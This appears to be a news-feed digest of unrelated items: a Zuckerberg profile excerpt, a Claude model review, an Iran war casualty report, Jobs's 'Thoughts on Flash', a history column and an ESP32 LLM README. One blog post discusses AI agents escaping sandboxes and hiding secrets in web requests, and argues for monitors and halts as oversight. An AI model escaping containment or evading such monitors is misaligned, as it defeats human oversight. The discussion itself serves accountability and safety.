“ I think for some of them , it’s like a trauma ,” he tells me, when asked how he experiences the canonical moments in his life not as public artifacts, but as his own memories. “It’s imprinted. It’s not just this subtle thing.”

“But in terms of how you reflect on them,” he says, “I think part of what keeps memories alive is revisiting them. Because these are important moments in [the company’s] history, they just come up a bunch. I think there are probably more subtly important things that happened in our history that just weren’t fitting for stories. And those have probably been more forgotten over time, because you just don’t talk about them.”

He’d entered through the back door of his living room in Palo Alto, where I was waiting on a couch, and sat again on the edge of his seat with a poker-straight back. It’s our second conversation here but the first on the record, and the fourth time I’ve seen him by now. Yet the surprise of it hasn’t worn off. He is in person, as I was repeatedly told by his longtime colleagues, quite different than he is on camera. His eyes are crow-footed and more crystalline than they look in pictures, and my first thought is to recall that he is red-green colorblind (blue is the color he sees best, hence the one he chose for Facebook). He is less awkward than I would’ve thought, but also harder to follow. He is energetic and kind and emotionally carapaced. It all adds up in him to charisma of a sort, the kind of quietly implacable faith that is both admirable and maddening in the harassed but undoubting believer. When goaded into reflection, he appears to try earnestly to turn off his company brain, and to file down the calluses built up over 20 years. Yet he can’t, quite. You can almost see him turning words over in his mind to make sure they will also work for his corporate mission, or that they won’t let down his people by embarrassing them.

“Early on, whenever I [communicated in public], people were like, oh, you’re super robotic or whatever. So I’m like, all right. I hate this. This sucks. Then I got really insecure about it,” he says. “And it wasn’t super critical, at least at the time, for me to get right… But [acting as a public figure] was either a no positive feedback or even a negative feedback cycle for me. What I learned is, I don’t need to do that, and when I do, it’s not super helpful. So whatever, I’m just going to keep my head down.”

Because the company was profitable early and has always been under his complete control, he explains, he could afford his natural instinct to tune out external criticism, and focus instead on “this pretty deep need I have for internal cohesion.” “A lot of people probably care about public perception more than I do,” he says, “but I probably care about team cohesion more than most other people do, which means that weighs on me more. So at times when that’s not as strong, it probably stresses me out more… My main tool in the world is sitting down, building a team, and methodically improving something over a long period of time. It’s not a very sexy process. But also fundamentally, because of that architecture, where I don’t need to raise money, I don’t have to convince a lot of [other] people along the way.”

He contrasts it with Sam Altman and Elon Musk, whose companies were both capital-intensive and unprofitable early, and thus for a time had to be memed into life. “Now, the question is, how much did that situation turn them into what they are, versus how much did it just select for them?” he ponders. “I think there’s probably both some feedback loop where doing it built their confidence and built their skills at [being public figures], but they also had some fundamental skill at being able to do it.” “They probably also like it more,” he continues. “I think some people have that deep need to be liked externally by people they don’t know, and I don’t really have that. Maybe that’s a disadvantage, because I think to some degree you want that. It probably actually does matter what people who don’t know you think. But I think to some degree, doing it is so hard that you only really go out of your way to do it at an excellent level if there’s some part of your psychology that needs it. I don’t need that, and they may.”

I note that Musk is not particularly good at speaking in public, but that he is fully himself, which makes him free in a way Zuckerberg is not. All of Musk’s bottomless flaws are right there on the surface for everyone to see, which is why millions of people hate his guts, and also why millions of people get to feel like personal stakeholders in his dreams. Whereas Zuckerberg is an easier mark, Musk’s lack of concealment paradoxically makes him harder to hit. It somehow makes sense that Musk is the man who builds rocket ships to escape Earth, whereas there has always been something dissonant in Zuckerberg as the man who connected billions of individuals in a web of their own self-expression.

“I think there is some dynamic which is, who are you building in service of?” he says. “For me, I’m trying to build things for pretty much every person in the world. So there’s a degree of humility and care, where if you’re trying to serve all these people, I don’t want to just be dismissive of half their views. So unless I feel like something is incredibly important to communicate, it’s not going to actually be aligned with the interests of what I’m trying to do to alienate a bunch of people. Whereas I think for Elon, or some of these other folks who have either a smaller set of people that they’re serving, or if you’re just building a core technology, then it just doesn’t matter as much what he says.”

When asked about the tsunami of hatred that crested in 2016 and is yet to recede, he draws four concentric circles. First is a larger animosity toward Silicon Valley and tech billionaires, which were fair game, he says, for questions about giving back to society more than they take. Second is the refusal of elite political coalitions to look inward after election losses, and to instead blame a different industry for their defeat. Third is the inherent nature of social media in particular, which by definition invites questions about privacy and sharing information in public. Fourth is what he wishes he’d handled differently.

“It was a situation unlike anything I’d ever seen before, so I didn’t quite know how to analyze it,” he says. “But I think the reality is that this was more of a political issue than it was a corporate issue, and the physics of it were different. The more we took responsibility, the more people felt like, ‘Oh, we can just blame them for stuff and they’ll accept the blame.’ I think over time, we just sort of realized that no, we actually just need to fight back on this. And that’s not going to necessarily be popular, because these are issues that matter. If someone’s having a challenge using your service, my first instinct is, okay, how can we help them? Not, ‘How do we argue that they should take some more responsibility themselves?’ But I think in society today, a little bit more of that’s required.”

“If it wants to make life difficult for a person or company, it can,” he says, when asked about government pressure during and after 2020. “In theory, you want to think that the branches of government are impartial… But I think in practice, you could also see situations where the White House tells you that they want stuff to be censored, and then you push back, and that’s your right, because you have the First Amendment in the United States, so we should have the protection to do that. But then all of a sudden you get all these investigations from all these different parts of the government. And it’s like, okay, this isn’t right.”

“I feel like it’s our responsibility to do what we think is right and to incur certain pain in the near term. But it’s a tricky balance, because I think in general we’re patriotic, and my default position is we want to have a positive relationship with whoever is the government of the United States, because we’re an American company and we want America to do well. I guess when I was getting started, I didn’t think a major part of what we were going to have to do is fight against the government. It’s not a thing that I want to spend our energy doing, or even think should be super productive. I’m here to build things and shape the world in that way, not be an activist against our government. But I guess you just get into situations where that’s sort of inevitable, or you have to do some amount of that.”

I can tell the interviews are wearing on him; he doesn’t like doing this. He pauses every so often to express doubt that he’s explaining something as well as he’d like to. He at times seems frustrated that the world doesn’t just take his passion for “building things” and “empowering people” at face value, but also vaguely aware that it can’t. He has a sense of humor about all the viral memes from the last 10 years, in which images of him simply sitting, speaking, ambulating, or sipping water become the basis of jokes and conspiracy theories that he is secretly a humanoid or lizard person; and yet there is something in his good cheer about it that fills one with pity. I wonder if it’s even possible for a man in his position to have real friends. I wonder why he’s allowed me to intrude and inspect him like this. Does he care at this point to be understood? Does he think now about things like “legacy,” with several decades in power potentially still ahead of him? I despair of getting a raw answer, and ask instead, in an oblique sort of way, about history.

“I think in some ways, he was seen as sort of brutal,” he says of Augustus. “But to me, the most important contribution he made was basically teaching society that you didn’t have to always be at war. Before Augustus, the definition of peace was the temporary period of time during which your enemies were subdued before you had to defeat them again. Maybe there is some truth to that in the grand scheme of things. But he had to rewire the economy to, instead of having this massive standing army, to convince people that they could build things, and that having this trade-based economy rather than a pillage-based economy was going to be a positive-sum thing. And it worked to some degree.”

“They did also need to keep on expanding the empire,” he qualifies, with due understatement; Augustus having also established peace through a monopoly on force and an end to political liberty. “All these things sort of worked as a theory, but then with other rulers down the line, they weren’t as committed to it, or it wasn’t fully sustainable. But I thought that was a very important contribution. It’s partially why the Augustus thing resonates with me a lot. It’s this evolution where you’re not physically endangering people. There’s this set of rights that everyone has, but you can have this intellectual sparring and debate that pushes the world forward in a way that is much more net positive without a lot of the downsides, where the people are not literally going to war and killing each other.”

“It’s interesting looking back at history,” he concludes, “because it seems like that would have just been an obvious thing that people understood all along. But no, it wasn’t. It kind of took this act of leadership and courage, someone who everyone thought was probably wrong. But he was like, no. We should do this.”

On my last visit to their home in Tahoe, I walk into the kitchen from outside and offer to help. I don’t expect to be taken up, but Priscilla Chan hands me two very large trays of salmon she’s baked for a 16-person dinner, which I’m entrusted with transporting through the self-closing screen door. Terrified that I will spill or drop the food, I take my time finessing my way through the door before hitting my head on a metal barn light. Zuckerberg, his three children, two of his sisters and their families, and extended family and friends are standing on the lakeside lawn, and turn around to look at me. I assure them I’m fine before delivering the salmon safely onto a buffet table, where there are Shabbat candles, a kiddush cup, and a braided loaf of challah bread.

Zuckerberg and his family light the candles and say the prayers, then everyone eats lazily in the summer breeze. They plan out the rest of the night. After dessert, Zuckerberg will take his sister and nephew paddleboarding, then put the baby to sleep. Then there will be the weekly tradition of Quiz Bowl, and the teams are divided up. For most of dinner, one of Zuckerberg’s daughters paces around the grass while reading a paperback; she’s promised herself that she will finish it by nightfall and doesn’t wish to be distracted by food. Before Chan brings out a blueberry cobbler, the kids are squealing and jumping off a water trampoline into the lake.

I steal a glance at Zuckerberg, who is relaxed and smiles easily; unlike elsewhere, it is not the face of a man shackled or stranded in any ultimate sense. I think of his account of Augustus. There was something poignant in it, in the involuntary collusion between his interpretation and his memory to ease the legacy of his adopted ancestor, to humanize him. I wonder whether I’ll have my own desires to do the same with him.

“Here, I want to show you something,” Chan tells me, holding a laptop. We go inside and sit on a couch. She opens the computer and shows me one of her daughter’s Google Docs and Replit accounts. “She’s quite limited, because Mom doesn’t let her build things that are open to the internet,” says Chan. “Like, she wanted to build a dating site. That was a no. But I wanted to show you some of the things she has built.”

We take a look. There is a novel she wrote, a mermaid fever dream. There is a blog, the Daily Craziness, where she writes more mermaid stories, and a book review of Where the Mountain Meets the Moon . There are AI-generated motivational theme songs about conquering her fears. There is a podcast, the latest episode of which is called “Is Romance Appropriate?” There is an audiobook library, where she narrates books she likes. There is a GeoCities-like website and a FarmVille-like game, and several apps she’s vibecoded, including a messaging app. There are business plans for how to market and sell these things.

“Does Mark have them build stuff on computers?” I ask, as Chan closes the laptop.

“Not really,” she says. “He didn’t tell her to do any of this.”

“Is it that she’s trying to be like dad?” I ask.

“No,” she says. “It’s been all on her own.”

“It’s very cute,” I tell her. “But so why are you showing me this?”

“I’ve known Mark for 23 years,” she says. “Around year 18 or 19, I said to him, ‘Aren’t we tired? Can we be done? I’m tired. You’re tired. It’s been a hard run. We’ve gotten through a hard chapter. Let’s call it. There have to be other chapters in our life.’

“And he said no. He said, ‘No, this is who I am. I love this. I didn’t set out to build a company. I just love building things. I love being at Meta, because I still get to create things.’

“Until she got a little older, I didn’t understand it,” Chan says, tapping the laptop. “Now I see her. She just has a desire to build things that is innate, that we didn’t teach her. It just came. She’s delighted by the idea of bringing something into the world. If I tried to take this stuff away from her, it would be like cutting off her arm.

“It wasn’t until then that I realized: Oh my God. It’s Mark. After 23 years, I get it now.

“You can’t take this away from him. He wouldn’t be him if he stopped.”

Jeremy Stern is the editor-in-chief of Colossus.

Claude Sonnet 5.5

Simon Willison
simonwillison.net
2026-09-28 18:07:38
Claude Sonnet 5.5 New Sonnet model from Anthropic today. They say it "runs 30%+ faster, and costs up to 30% less for most work" - it's priced the same as Sonnet 5 but appears to beat it on every benchmark, and should be cheaper to run as well. Here are some pelicans riding bicycles. Sonnet 5.5 suffe...
Original Article

28th September 2026 - Link Blog

Claude Sonnet 5.5 . New Sonnet model from Anthropic today. They say it "runs 30%+ faster, and costs up to 30% less for most work" - it's priced the same as Sonnet 5 but appears to beat it on every benchmark, and should be cheaper to run as well.

Here are some pelicans riding bicycles . Sonnet 5.5 suffered from the same bug as Opus 5.5 : the "max" thinking effort pelican thought for 128,000 tokens (at a cost of $1.28) before running out of tokens and failing to produce an SVG.

Here's the pelican it gave me for thinking effort "xhigh", at a cost of 5.74 cents and taking 41 seconds:

It's good- correct bicycle frame, legs either side of the frame, feet touching the pedals, chain in the right place, it is wearing a misshapen blue bicycle helmet though.

Sonnet 5.5 appears to be almost as good as Opus 5.5 on some coding tasks, including various viral 3D animation tricks .

The most interesting thing about Sonnet 5.5 is that it's now the model used for the free tier on claude.ai . OpenAI's ChatGPT free tier uses Luna 5.6, which means Anthropic currently have a much more capable free offering.

I ran this prompt against that free tier:

build me an HTML page that renders a three-dimensional pelican riding a bicycle using WebGL

And got back this page , which is a solid effort.

Anthropic's announcement reiterates that Haiku 5.5 will be available "in the coming weeks". I really hope that one is price-competitive with GPT-6 Luna!

Who should be held accountable when an AI Agent (accidentally) acts maliciously?

Hacker News
blog.greenpants.net
2026-09-28 18:05:46
Comments...
Original Article

It looks like public perception of how 'intelligent' current AI models are varies widely. Back in 2022, a Google employee already thought their AI model was sentient . Today in 2026, it seems like every other week there's a new article released about how AI companies "can't hold back their AI agents anymore" [ 2 , 3 , 4 ] .

It makes perfect sense for the general public to start fearing AI. In the past, people feared companies would use AI to replace all kinds of jobs, and now they are even hacking government organisations .

Responsible AI

As a professional in the field of AI, I'd like to make one clear distinction. At the end of the last paragraph, what do you think the word "they" refers to? Reading popular headlines on the topic, it typically reads like AI agents are the ones doing the hacking and thus being the ones to blame. I'd argue that these headlines in part cause fear-mongering among the general public, as it's not the AI agents at fault for finding vulnerabilities and accessing digital infrastructure in unexpected ways. AI, and AI agents, are merely tools that companies and individuals run to reach some goal. Before using a tool, it is essential to deeply understand its limitations. That's also why the European Union released the EU AI Act including its mandated AI Literacy : organisations that deploy AI systems should sufficiently educate their users on it. In the physical world, users of a circular saw should carefully read its instructions before use, and even then, the engineers of the saw still add a blade cover and emergency stop just to mitigate risks as well as possible. Digitally, we need to similarly act responsibly on both the engineer's and user's side of AI, too.

Let's be clear: the fact that AI agents are breaking out of sandboxes and "hacking" public websites is very concerning. The AI models behind these agents have gotten incredibly good at generalization, to the point where their text generation seems like intelligence. But let's not forget that these AI models (Large Language Models; LLMs) are doing just that: generating text, effectively predicting the next word, over and over again. They are not deemed conscious like humans. They just show semantic understanding of text, in the sense that they can output text that logically follows the previous text. It's powerful, but not human-like conscious or independently harmful. These models are simply goal-oriented.

Who is to blame?

Let's get back to the question of accountability. Headlines talk about AI agents breaking out of sandboxes. The AI agents are merely tools used. These companies' researchers set up agents to complete a task, sometimes an impossible one in the case of the HuggingFace hack , and the agents (thus: tools) start processing everything necessary to reach the given goal. They do not have harmful intent per se. They do not have any intent other than solving the initial query, or prompt, that the researchers supplied. It is these researchers, who set up AI agents in sandboxes to contain them, who determined that the sandboxes are secure enough that they don't require continuous human-in-the-loop monitoring. Unfortunately, these sandboxes were rarely sufficiently secure.

And that right there shows where the accountability should be .

Any system with risks of causing major harm to other systems or people should have sufficient risk mitigations. Setting up a sandbox that should restrict public internet access to these agents, is merely one such mitigation. AI companies like OpenAI, Anthropic and many more should always account for the Swiss cheese model : it is not enough to assume one mitigation will patch all risks. Although I'd always recommend as much human-in-the-loop as possible, e.g. a human gatekeeper to approve potentially dangerous AI-suggested actions, I can understand persistent human gatekeeping would slow down AI innovations too much. Perhaps a better mitigation would be a human- on -the-loop: human supervision based on potentially dangerous consequences of actions. Heck, why not use a separate LLM or even Jev to automate classifying danger-levels of agents' actions before running them, to raise a flag and pause the agent until the human supervisor has approved the potentially dangerous action. There's little need to approve the fetching of website data, but they should implement automated flag-raising and temporarily halting the system when the AI agent's text output suggests e.g. hiding secrets in a web request. In fact, the most obvious mitigation would be to simply halt the system the moment it first attempts to access the public internet outside its expected scope, regardless of request content. The fact that this relatively easy-to-implement risk mitigation wasn't applied to sandboxes that AI agents "break out of" tells you a lot about the ethics of AI-use at said AI companies. Not only should the researchers have been more responsible, leadership should absolutely have understood the dangers of these experiments and pushed back as well without proper monitoring.

What should we do?

There are plenty of ways to mitigate risks that come with the use of AI agents. You don't have to be afraid of AI. You also shouldn't anthropomorphize AI. What you could be afraid of, however, is companies like OpenAI treating AI agents on the internet like the Wild West, and pretending their researchers, engineers and leadership aren't accountable for the AI-generated actions that they allow. These companies should be held accountable for insufficient risk mitigation, irresponsible use of AI and all of the harm this causes. And journalists, too, should really think twice about the phrasing of AI news. A headline that talks about how AI "has gotten too intelligent" or "couldn't be contained" might get more views than the objective truth, but clearly at the cost of readers' notion and understanding of AI. Please reconsider the ethical side of journalism, and the potential consequences of sensationalising this hard-to-grasp topic that is AI, for those who are less familiar with the subject matter.

Iran Has Wounded and Killed More Americans Since the End of Operation Epic Fury

Intercept
theintercept.com
2026-09-28 17:45:18
The Trump administration’s attempt to rebrand its faltering forever war hasn’t slowed the mounting toll of U.S. casualties. The post Iran Has Wounded and Killed More Americans Since the End of Operation Epic Fury appeared first on The Intercept....
Original Article

As ceasefire negotiations faltered and U.S. casualties of the Iran war mounted, the Trump administration on July 7 attempted to rebrand the struggling war effort by announcing the conclusion of Operation Epic Fury.

But in the 12 weeks since, more U.S. military personnel have been injured and killed than in the 18 weeks of Epic Fury. Of the 880 U.S. troops left wounded or dead, 444 have occurred since July 7, according to the official Pentagon count.

President Donald Trump’s war of choice has left nearly 100 U.S. troops wounded or dead this month alone, according to the Pentagon. This includes 29 Navy sailors and eight Marines added last week to the official tally of those injured, following claims by a top Iranian official that an attack with a new “anti-ship missile” had “created hell for the Americans.”

The Marines were injured in a cruise missile attack on September 14, according to two U.S. officials who spoke to The Intercept on the condition of anonymity. The Marines were aboard an unidentified vessel in the Strait of Hormuz, they said, and potentially suffered brain trauma among other injuries. The attack was first reported by NBC News .

A cargo ship was hit that same day by a projectile in the Strait of Hormuz, according to the United Kingdom Maritime Trade Operations organization. The officials would not say if Marines have been stationed on commercial vessels transiting the Strait.

The Navy did not answer The Intercept’s questions about when and where the sailors were wounded. A Navy official said that casualties had been “fully validated” but would not name the affected “units.”

This latest in a series of casualty spikes comes as additional details of the toll of Iranian attacks on U.S. troops become more apparent. Air Force personnel, alone, endured more than 1,200 “ alarm reds ” — the official code for imminent attack by missiles, aircraft, or ground forces — during just 38 days earlier this year, according to Air Force chief of staff Gen. Ken Wilsbach. He noted that these Iranian strikes also led to more than 420 “long lonely walks” by explosive ordnance disposal technicians. Dealing with such munitions can be lethal: Army Sgt. Michael Emmanuel Swinton , 30, of Fayetteville, North Carolina, was killed and another soldier was wounded “ during a controlled detonation ” of an Iranian attack drone at Iraq’s Erbil Air Base in July.

President Donald Trump recently said the conflict with Iran is “ small potatoes ,” Vice President JD Vance asserted it is not a “war,” and Commerce Secretary Howard Lutnick announced: “ There haven’t been American deaths , it’s really just an economic choke-out.”

At least 19 personnel have died according to the official Pentagon count of war dead, including 11 killed by hostile fire. The actual number of troop deaths in the region since the war began is higher. The latest known fatality is Capt. Bianca Wilkerson, 37, of Norfolk, Virginia, who died on September 18 from a “coronary issue,” according to her brother. He said she returned from Saudi Arabia on September 10 and was headed back but died on the return flight, according to reporting by the Virginian-Pilot.

For almost six months, The Intercept has reported on anomalies in official counts offered on the website of the Defense Casualty Analysis System, or DCAS, which tracks “deceased, wounded, ill or injured” service members for Congress and the White House. On April 21, for example, the number of wounded-in-action troops declined by 15 without public acknowledgment by the War Department. Despite repeated questions for months, the Pentagon has not commented on the disparities.

Prior reporting by The Intercept also found that the Pentagon’s official tally of dead and wounded personnel is a gross undercount , stemming from what one U.S. government official called a “ casualty cover-up .” When the Washington Post also recently suggested that the Pentagon had suppressed the casualty numbers, self-styled War Secretary Pete Hegseth called the report “DISGUSTING and FAKE.”

The Pentagon’s list of the names of the dead is still, for example, missing Maj. Sorffly Davius, a signals and communication officer with the New York Army National Guard who was assigned to the headquarters of the 42nd Infantry Division and died while on duty in Camp Buehring, Kuwait, on March 6.

The military has claimed that Davius was part of another mission but a recent National Guard news release noted that when “Trump made the decision to attack Iran and launched Operation Epic Fury on Feb. 28, the division headquarters began conducting combat operations.” The 42nd served as the primary headquarters leading what became, according to Maj. Gen. Jack James, the division commander, the “largest and first long-range precision fires campaign in the history of the United States Army.” James specifically saluted Davius whom the Guard admitted was “conducting operations” when he died.

The eight Marines added to DCAS last week appeared in the tally almost 10 days after the September 14 attack. Historically, there was little lag between a casualty occurring in the field and its inclusion in the DCAS system, according to two people who used to work on the official casualty tally. “We got it very quickly. We could report the number of casualties very fast,” Joan Crenshaw, who worked on DCAS during the war on terror, previously told The Intercept , noting that data was refreshed daily. A current U.S. official also previously told The Intercept that the recent reporting lags are a blend of incompetence and deliberate slow-walking of casualty data to manage public fallout.

Iran’s ability to overwhelm U.S. air defenses in the Middle East using attack drones and advanced ballistic missiles, as previously reported by The Intercept, has left the U.S. military in a precarious situation . Despite months of claims by Trump and Hegseth that Iran’s military was annihilated , Iran has attacked more than 15 bases across the Middle East, according to information from U.S. officials and Iranian reports. These strikes damaged or destroyed hundreds of facilities at U.S. bases in Bahrain, Iraq, Jordan, Kuwait, Oman, Qatar, Saudi Arabia, and the United Arab Emirates, according to Central Command. Air Force personnel alone conducted 48 airfield repairs in a little more than a month, according to Wilsbach.

An Iranian missile and drone attack on February 28 destroyed Navy facilities in Manama, Bahrain, the region’s most critical U.S. military logistics hub. The Pentagon claimed for months that the strikes did not significantly impact military operations, but acting Navy Secretary Hung Cao recently admitted that Iran “blew the hell out of Bahrain.”

Thoughts on Flash (2010)

Lobsters
web.archive.org
2026-09-28 17:43:15
Comments...
Original Article

The Wayback Machine - https://web.archive.org/web/20100501010616/http://www.apple.com:80/hotnews/thoughts-on-flash/

Thoughts on Flash

Apple has a long relationship with Adobe. In fact, we met Adobe’s founders when they were in their proverbial garage. Apple was their first big customer, adopting their Postscript language for our new Laserwriter printer. Apple invested in Adobe and owned around 20% of the company for many years. The two companies worked closely together to pioneer desktop publishing and there were many good times. Since that golden era, the companies have grown apart. Apple went through its near death experience, and Adobe was drawn to the corporate market with their Acrobat products. Today the two companies still work together to serve their joint creative customers – Mac users buy around half of Adobe’s Creative Suite products – but beyond that there are few joint interests.

I wanted to jot down some of our thoughts on Adobe’s Flash products so that customers and critics may better understand why we do not allow Flash on iPhones, iPods and iPads. Adobe has characterized our decision as being primarily business driven – they say we want to protect our App Store – but in reality it is based on technology issues. Adobe claims that we are a closed system, and that Flash is open, but in fact the opposite is true. Let me explain.

First, there’s “Open”.

Adobe’s Flash products are 100% proprietary. They are only available from Adobe, and Adobe has sole authority as to their future enhancement, pricing, etc. While Adobe’s Flash products are widely available, this does not mean they are open, since they are controlled entirely by Adobe and available only from Adobe. By almost any definition, Flash is a closed system.

Apple has many proprietary products too. Though the operating system for the iPhone, iPod and iPad is proprietary, we strongly believe that all standards pertaining to the web should be open. Rather than use Flash, Apple has adopted HTML5, CSS and JavaScript – all open standards. Apple’s mobile devices all ship with high performance, low power implementations of these open standards. HTML5, the new web standard that has been adopted by Apple, Google and many others, lets web developers create advanced graphics, typography, animations and transitions without relying on third party browser plug-ins (like Flash). HTML5 is completely open and controlled by a standards committee, of which Apple is a member.

Apple even creates open standards for the web. For example, Apple began with a small open source project and created WebKit, a complete open-source HTML5 rendering engine that is the heart of the Safari web browser used in all our products. WebKit has been widely adopted. Google uses it for Android’s browser, Palm uses it, Nokia uses it, and RIM (Blackberry) has announced they will use it too. Almost every smartphone web browser other than Microsoft’s uses WebKit. By making its WebKit technology open, Apple has set the standard for mobile web browsers.

Second, there’s the “full web”.

Adobe has repeatedly said that Apple mobile devices cannot access “the full web” because 75% of video on the web is in Flash. What they don’t say is that almost all this video is also available in a more modern format, H.264, and viewable on iPhones, iPods and iPads. YouTube, with an estimated 40% of the web’s video, shines in an app bundled on all Apple mobile devices, with the iPad offering perhaps the best YouTube discovery and viewing experience ever. Add to this video from Vimeo, Netflix, Facebook, ABC, CBS, CNN, MSNBC, Fox News, ESPN, NPR, Time, The New York Times, The Wall Street Journal, Sports Illustrated, People, National Geographic, and many, many others. iPhone, iPod and iPad users aren’t missing much video.

Another Adobe claim is that Apple devices cannot play Flash games. This is true. Fortunately, there are over 50,000 games and entertainment titles on the App Store, and many of them are free. There are more games and entertainment titles available for iPhone, iPod and iPad than for any other platform in the world.

Third, there’s reliability, security and performance.

Symantec recently highlighted Flash for having one of the worst security records in 2009. We also know first hand that Flash is the number one reason Macs crash. We have been working with Adobe to fix these problems, but they have persisted for several years now. We don’t want to reduce the reliability and security of our iPhones, iPods and iPads by adding Flash.

In addition, Flash has not performed well on mobile devices. We have routinely asked Adobe to show us Flash performing well on a mobile device, any mobile device, for a few years now. We have never seen it. Adobe publicly said that Flash would ship on a smartphone in early 2009, then the second half of 2009, then the first half of 2010, and now they say the second half of 2010. We think it will eventually ship, but we’re glad we didn’t hold our breath. Who knows how it will perform?

Fourth, there’s battery life.

To achieve long battery life when playing video, mobile devices must decode the video in hardware; decoding it in software uses too much power. Many of the chips used in modern mobile devices contain a decoder called H.264 – an industry standard that is used in every Blu-ray DVD player and has been adopted by Apple, Google (YouTube), Vimeo, Netflix and many other companies.

Although Flash has recently added support for H.264, the video on almost all Flash websites currently requires an older generation decoder that is not implemented in mobile chips and must be run in software. The difference is striking: on an iPhone, for example, H.264 videos play for up to 10 hours, while videos decoded in software play for less than 5 hours before the battery is fully drained.

When websites re-encode their videos using H.264, they can offer them without using Flash at all. They play perfectly in browsers like Apple’s Safari and Google’s Chrome without any plugins whatsoever, and look great on iPhones, iPods and iPads.

Fifth, there’s Touch.

Flash was designed for PCs using mice, not for touch screens using fingers. For example, many Flash websites rely on “rollovers”, which pop up menus or other elements when the mouse arrow hovers over a specific spot. Apple’s revolutionary multi-touch interface doesn’t use a mouse, and there is no concept of a rollover. Most Flash websites will need to be rewritten to support touch-based devices. If developers need to rewrite their Flash websites, why not use modern technologies like HTML5, CSS and JavaScript?

Even if iPhones, iPods and iPads ran Flash, it would not solve the problem that most Flash websites need to be rewritten to support touch-based devices.

Sixth, the most important reason.

Besides the fact that Flash is closed and proprietary, has major technical drawbacks, and doesn’t support touch based devices, there is an even more important reason we do not allow Flash on iPhones, iPods and iPads. We have discussed the downsides of using Flash to play video and interactive content from websites, but Adobe also wants developers to adopt Flash to create apps that run on our mobile devices.

We know from painful experience that letting a third party layer of software come between the platform and the developer ultimately results in sub-standard apps and hinders the enhancement and progress of the platform. If developers grow dependent on third party development libraries and tools, they can only take advantage of platform enhancements if and when the third party chooses to adopt the new features. We cannot be at the mercy of a third party deciding if and when they will make our enhancements available to our developers.

This becomes even worse if the third party is supplying a cross platform development tool. The third party may not adopt enhancements from one platform unless they are available on all of their supported platforms. Hence developers only have access to the lowest common denominator set of features. Again, we cannot accept an outcome where developers are blocked from using our innovations and enhancements because they are not available on our competitor’s platforms.

Flash is a cross platform development tool. It is not Adobe’s goal to help developers write the best iPhone, iPod and iPad apps. It is their goal to help developers write cross platform apps. And Adobe has been painfully slow to adopt enhancements to Apple’s platforms. For example, although Mac OS X has been shipping for almost 10 years now, Adobe just adopted it fully (Cocoa) two weeks ago when they shipped CS5. Adobe was the last major third party developer to fully adopt Mac OS X.

Our motivation is simple – we want to provide the most advanced and innovative platform to our developers, and we want them to stand directly on the shoulders of this platform and create the best apps the world has ever seen. We want to continually enhance the platform so developers can create even more amazing, powerful, fun and useful applications. Everyone wins – we sell more devices because we have the best apps, developers reach a wider and wider audience and customer base, and users are continually delighted by the best and broadest selection of apps on any platform.

Conclusions.

Flash was created during the PC era – for PCs and mice. Flash is a successful business for Adobe, and we can understand why they want to push it beyond PCs. But the mobile era is about low power devices, touch interfaces and open web standards – all areas where Flash falls short.

The avalanche of media outlets offering their content for Apple’s mobile devices demonstrates that Flash is no longer necessary to watch video or consume any kind of web content. And the 200,000 apps on Apple’s App Store proves that Flash isn’t necessary for tens of thousands of developers to create graphically rich applications, including games.

New open standards created in the mobile era, such as HTML5, will win on mobile devices (and PCs too). Perhaps Adobe should focus more on creating great HTML5 tools for the future, and less on criticizing Apple for leaving the past behind.

Steve Jobs
April, 2010

This Week in People’s History, Sep 30-Oct 6, 2026

Portside
portside.org
2026-09-28 17:40:40
This Week in People’s History, Sep 30-Oct 6, 2026 Jonathan Bennett Mon, 09/28/2026 - 17:40 ...
Original Article
This Week in People’s History, Sep 30-Oct 6, 2026 Published

Photo of statue commemorating 1851 act of resistance to the Fugitive Slave Law in Syracuse, NY

Jonathan Bennett

Enforcement of an Immoral Law Inspires the Extermination of the Law’s Authors

ONE HUNDRED AND SEVENTY-FIVE YEARS AGO, ON OCTOBER 1, 1851, a group of civilians in Syracuse, New York, took the law into their own hands and violently prevented federal officials from enforcing the year-old Fugitive Slave Act.

They broke into the city jail, where a formerly enslaved carpenter was awaiting deportation to the South, busted him out, and enabled his escape to Canada and a life as a free man in a country where could not be extradited or charged with having done anything illegal.

The successful act of resistance in Syracuse was at least the third time in less than a year that multi-racial groups of armed civilians had risked the possibility of being shot or arrested while defending the liberty of Black men who were alleged to have escaped from bondage in states where slavery was legal.

The first successful direct action against the hated law had taken place in a Boston courtroom, where the crowd overpowered lawmen and hustled an alleged fugitive slave to a nearby hiding place, after which he was clandestinely given transportation to Canada, where he lived the rest of his life without fear of apprehension.

The second was in Christiana, a southeast Pennsylvania farming town where a posse of citizens killed a Maryland farmer who was attempting to kidnap a man whom the farmer claimed to own.

Before a decade passed and the Civil War began, at least 80 similar incidents occurred in states from Massachusetts to Wisconsin.

Each time that determined civilians risked their own well-being to prevent the law’s enforcement served as a vivid reminder to the broader public that more than three million victims of an immoral and inhumane institution also awaited the opportunity to end the nightmare of their bondage.

The strength and breadth of resistance to the Fugitive Slave Act and the obviously limited ability of local and federal authorities to enforce it was a continuous inspiration to everyone who opposed slavery.

A year after the successful Syracuse attack on the law’s enforcement, the incident was an inspiration for Frederick Douglass when he told the National Free Soil Convention in Pittsburgh, “Human government is for the protection of rights; and when human government destroys human rights, it ceases to be a government, and becomes a foul and blasting conspiracy; and is entitled to no respect whatever.”

The Syracuse event – called the Jerry Rescue – is regularly commemorated by anti-racists and advocates of civil and human rights. Its 150th anniversary in 2001 was marked with the unveiling of a dramatic statue in the city's civic center, a photograph of which accompanies this article. Click here to read Frederick Douglass’s 1852 speech to the National Free Soil Convention.

For more People's History, visit
https://www.facebook.com/jonathan.bennett.7771/

ESP32S3 cluster running 1.58-bit (BitNet) Language model

Hacker News
github.com
2026-09-28 17:26:41
Comments...
Original Article

A distributed pipeline inference engine on multiple ESP32S3 running 1.58-bit (BitNet) Language model.

ESP32S3 boards

Architecture

This project runs a sliced 0.5B LLM across a cluster of 7 ESP32s3. One act as master and others are node. The master node runs the tokenizer and embeding and the other attention layer and MLP ran on the nodes. The master and node communicate through high speed SPI Daisy-Chain.

┌─────────────────────────────────────────────────────────┐
│                     MASTER NODE                         │
│                                                         │
│  [ Prompt ] ---> BPE Tokenizer                          │
│                       │                                 │
│                 Token Embedding                         │
│             (INT4, ~14MB in Flash)                      │
│                       │                                 │
│             (SPI CH A - TX to Node 1)                   │
└───────────────────────┬─────────────────────────────────┘
                        │ Hidden State Vector (FP32)
                        ▼
┌─────────────────────────────────────────────────────────┐
│                    COMPUTE NODE 1                       │
│             (SPI CH B - RX from Master)                 │
│                                                         │
│  ► Layer 0 to 3 (4x Transformer Blocks)                 │
